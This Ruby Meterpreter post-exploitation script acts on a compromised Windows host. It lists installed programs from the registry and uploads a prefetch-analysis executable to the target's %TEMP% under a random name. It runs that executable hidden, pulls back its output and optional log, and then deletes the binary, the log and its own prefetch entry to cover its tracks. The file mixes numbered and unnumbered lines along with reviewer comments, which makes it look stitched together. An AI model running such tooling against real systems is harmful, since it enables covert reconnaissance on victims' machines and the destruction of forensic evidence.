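#!/usr/bin/env ruby
# Meterpreter script for extracting information from the Windows prefetch folder
# Provided by Milo at keith.lee2012[at]gmail.com
# Version: 0.1.0
#
# Script-wide setup: the active Meterpreter session, the option table and the
# remote scratch locations that the helper methods below receive as parameters.
# Top-level locals are not visible inside `def`, so everything the helpers need
# is passed explicitly; values that nothing reads (runTop, logs, host/port) are
# not kept around.
session = client

# Script Options
exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu."],
  "-p" => [ false, "List Installed Programs"],
  "-c" => [ false, "Disable SHA1/MD5 checksum"],
  "-x" => [ true,  "Top x Accessed Executables (Based on Prefetch folder)"],
  "-d" => [ false, "Disable lookup for software name"],
  "-l" => [ false, "Download Prefetch Folder Analysis Log"]
)

# Remote %TEMP% and a random 5-digit basename for the tool's log file on the target.
tmp = session.fs.file.expand_path("%TEMP%")
imgname = sprintf("%.5d", rand(100000))
# Extra switch for the prefetch tool; set by -l in the option parser and handed to prefetchdump.
logs1 = ''

# Meterpreter response timeout applied while the tool runs on the target.
timeoutsec = 1000
#---------------------------------------------------------------------------------------------------------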
  25. def readprogramlist(session)
  26.         begin
  27.         key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ)
  28.         sfmsvals = key.enum_key
  29.         sfmsvals.each do |test1|
  30.                 begin                  
  31.                         key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1
  32.                         root_key2, base_key2 = session.sys.registry.splitkey(key2)
  33.                         value1 = "DisplayName"
  34.                         value2 = "DisplayVersion"
  35.                         open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
  36.                         v1 = open_key.query_value(value1)
  37.                         v2 = open_key.query_value(value2)
  38.                         print_status("#{v1.data}\t(Version:  #{v2.data})")
  39.                 rescue
  40.                 end
  41.         end
  42.         end
  43. end
  44.  
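def prefetchdump(session, tmp, imgname, options, logs1, timeoutsec)
  # Uploads the prefetch analysis tool to the target's %TEMP%, runs it with the
  # operator-chosen switches, streams its output back and then removes the
  # uploaded binary again.
  #
  # @param session [Rex::Post::Meterpreter::Client] open Meterpreter session
  # @param tmp [String] remote %TEMP% directory
  # @param imgname [String] basename of the remote log file (without .txt)
  # @param options [String] extra command-line switches for the tool
  # @param logs1 [String] " --txt=<remote path>" when a log should be written, else ""
  # @param timeoutsec [Integer] Meterpreter response timeout while the tool runs
  # @return [String, nil] local directory the log is later downloaded into when
  #   logs1 is set; nil otherwise, and nil when the upload failed
  prefetchexe = File.join(Msf::Config.install_root, "data", "prefetch.exe")
  prefetchlog = sprintf("%.5d", rand(100000))
  remote_exe = "#{tmp}\\#{prefetchlog}.exe"

  print_status("Uploading Prefetch-tool for analyzing Prefetch folder....")
  begin
    session.fs.file.upload_file(remote_exe, prefetchexe)
    print_status("Prefetch-tool uploaded as #{remote_exe}")
  rescue ::StandardError => e
    # Nothing to run if the upload failed; the original carried on and tried to
    # execute a file that was never written.
    print_status("The following Error was encountered: #{e.class} #{e}")
    return nil
  end
  session.response_timeout = timeoutsec

  logs = nil
  if logs1 != ''
    host = session.tunnel_peer.split(':').first
    # NOTE(review): "%Y%m%d.%M%S" has no hour field, so runs in different hours
    # of one day share a directory; the random log basename keeps collisions unlikely.
    logs = ::File.join(Msf::Config.config_directory, 'logs', 'prefetch', host + "-" + ::Time.now.strftime("%Y%m%d.%M%S"))
    ::FileUtils.mkdir_p(logs)
    print "[*] Saving prefetch logs to #{tmp}\\#{imgname} "
  end

  begin
    r = session.sys.process.execute("cmd.exe /c #{remote_exe} #{options} #{logs1}.txt", nil, {'Hidden' => 'true', 'Channelized' => true})
    # Draining the channel until the tool closes it is what actually waits for the output.
    while (d = r.channel.read)
      print_status d
    end
    sleep(2)
    # Poll until no process with the tool's name is left. The original flag loop
    # reset its flag on every non-matching process, so it exited after a single
    # pass unless the tool happened to be last in the process list.
    prog2check = "#{prefetchlog}.exe"
    while session.sys.process.get_processes.any? { |p| p['name'].downcase == prog2check }
      print "."
      sleep(0.5)
    end
    r.channel.close
    r.close
    print "\n"
    print_status("Finish extracting prefetch folder data") if logs1 != ""
    print_status("Deleting #{prefetchlog}.exe from target...")
    session.sys.process.execute("cmd.exe /c del #{remote_exe}", nil, {'Hidden' => 'true'})
    print_status("Clearing prefetch-tool prefetch entry ...")
    session.sys.process.execute("cmd.exe /c del %windir%\\prefetch\\#{prefetchlog}*.pf", nil, {'Hidden' => 'true'})
  rescue ::StandardError => e
    # StandardError rather than Exception: interrupts and exit requests propagate
    # instead of being printed and swallowed. Confirm that framework timeout
    # errors, which may not derive from StandardError, should propagate as well.
    print_status("The following error was encountered: #{e.class} #{e}")
  end
  logs
end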
  99. def logdown(session,tmp,imgname,logs,timeoutsec)
  100.         session.response_timeout=timeoutsec
  101.         print_status("Downloading prefetch-tool logs to #{logs}")
  102.         begin
  103.                 session.fs.file.download_file("#{logs}#{::File::Separator}#{imgname}.txt", "#{tmp}\\#{imgname}.txt")
  104.                 print_status("Finished downloading prefetch-tool log")
  105.                 print_status("Deleting left over files...")
  106.                 session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
  107.                 print_status("Prefetch-tool log on target deleted")
  108.         rescue::Exception => e
  109.                         print_status("The following Error was encountered: #{e.class} #{e}")
  110.         end
  111. end
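
################## MAIN ##################
# Parsing of Option
# Flags driven by the switches in exec_opts. hlp is raised by both -h and -p:
# either one suppresses the prefetch run. checksum/inetlookup from the original
# were never read and are gone.
hlp = 0
dwld = 0
options1 = ""
viewPrograms = 0

exec_opts.parse(args) { |opt, _idx, val|
  case opt
  when "-x"
    # The value is spliced into the remote command line, so accept digits only;
    # a missing or malformed value is reported instead of being passed through.
    if val =~ /\A\d+\z/
      options1 += " --x=#{val}"
    else
      print_status("-x expects a positive integer, got #{val.inspect}")
      hlp = 1
      break
    end
  when "-c"
    options1 += " --disable-md5 --disable-sha1"
  when "-p"
    viewPrograms = 1
    hlp = 1
  when "-d"
    options1 += " --disable-lookup"
  when "-l"
    logs1 = " --txt=#{tmp}\\#{imgname}"
    dwld = 1
  when "-h"
    hlp = 1
    # exec_opts is a plain local; the original referenced an undefined
    # @@exec_opts class variable here, so -h raised NameError instead of
    # printing the usage text.
    print("Prefetch-tool Meterpreter Script\n" + exec_opts.usage)
    break
  end
}
readprogramlist(session) if viewPrograms == 1

if hlp == 0
  print_status("Running Prefetch-tool Script.....")
  logs2 = prefetchdump(session, tmp, imgname, options1, logs1, timeoutsec)
  # prefetchdump yields nil when no local log directory was prepared, in which
  # case there is nothing to download.
  logdown(session, tmp, imgname, logs2, timeoutsec) if dwld == 1 && logs2
end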